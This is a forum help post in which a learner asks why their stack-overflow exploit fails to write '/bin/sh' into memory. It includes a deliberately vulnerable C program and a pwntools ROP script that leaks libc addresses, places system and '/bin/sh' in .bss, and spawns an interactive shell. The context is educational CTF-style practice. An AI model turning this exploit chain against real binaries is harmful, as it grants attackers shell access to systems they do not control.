-
-
[求助]为什么我无法向指定内存写入字符串?
-
发表于: 2025-4-11 18:16
-
源代码:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
void vulnerable_function() {
char buf[128];
read(STDIN_FILENO, buf, 512);
}
int main(int argc, char** argv) {
write(STDOUT_FILENO, "Hello, World\n", 13);
vulnerable_function();
}gadgets:
from pwn import *
elf = ELF('./level5')
libc = ELF('/usr/lib/x86_64-linux-gnu/libc.so.6')
write_got = elf.got['write']
print(hex(write_got))
read_got = elf.got['read']
print(hex(read_got))
offset_write_system = libc.symbols['write'] - libc.symbols['system']
print(hex(offset_write_system))
main = 0x400564
sh = process('./level5')
#rdi = edr = r13 , r15 = rdx , r14 = rsi
#write(rdi = 1,rsi = got_write,rdx = 4)
#pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload1 = flat(
[
"\x00"*136,
p64(0x400606),
p64(0),
p64(0),
p64(1),
p64(write_got),
p64(1),
p64(write_got),
p64(8),
p64(0x4005F0),
"\x00"*56,
p64(main)
]
)
sh.send(payload1)
sleep(1)
sh.recvuntil("Hello, World\n")
write_addr = u64(sh.recv(8))
print(hex(write_addr))
system_addr = write_addr - offset_write_system
print(hex(system_addr))
bss_base = 0x601000
#rdi = edr = r13 , r15 = rdx , r14 = rsi
#read(rdi = 0,rsi = bss_base,rdx = 16)
#pop_junk_rbx_rbp_r12_r13_r14_r15_ret
payload2 = flat(
[
"\x00"*136,
p64(0x400606),
p64(0),
p64(0),
p64(1),
p64(read_got),
p64(0),
p64(bss_base),
p64(16),
p64(0x4005F0),
"\x00"*56,
p64(main)
]
)
sh.send(payload2)
sleep(1)
sh.send(p64(system_addr))
sh.send("/bin/sh\0")
sleep(1)
sh.recvuntil("Hello, World\n")
#rdi= edi = r13, rsi = r14, rdx = r15
#system(rdi = bss_addr+8 = "/bin/sh")
payload3 = flat(
[
"\x00"*136,
p64(0x400606),
p64(0),
p64(0),
p64(1),
p64(bss_base),
p64(0),
p64(bss_base + 8),
p64(16),
p64(0x4005F0),
"\x00"*56,
p64(main)
]
)
sleep(1)
sh.send(payload3)
sh.interactive()0x601000到0x602000是可写的
我在sh.send("/bin/sh\0")后调试
在sh.send("/bin/sh\0")后:
system地址被写入0x601000,而"/bin/sh\0"没有被写到内存中。
另外,当我尝试手动向0x601008处写入"/bin/sh\0"时,程序因崩溃出现错误:
Traceback (most recent call last): File "/home/lina/pwn/lib/python3.10/site-packages/pwnlib/tubes/process.py", line 757, in send_raw self.proc.stdin.flush() BrokenPipeError: [Errno 32] Broken pipe During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/home/lina/pwn/test.py", line 111, in <module> sh.send(payload3) File "/home/lina/pwn/lib/python3.10/site-packages/pwnlib/tubes/tube.py", line 831, in send self.send_raw(data) File "/home/lina/pwn/lib/python3.10/site-packages/pwnlib/tubes/process.py", line 759, in send_raw raise EOFError EOFError
请问这是为什么?
[培训]Windows内核深度攻防:从Hook技术到Rootkit实战!
最后于 2025-4-11 18:25
被mb_zdstlaeb编辑
,原因:
|
|
|---|---|
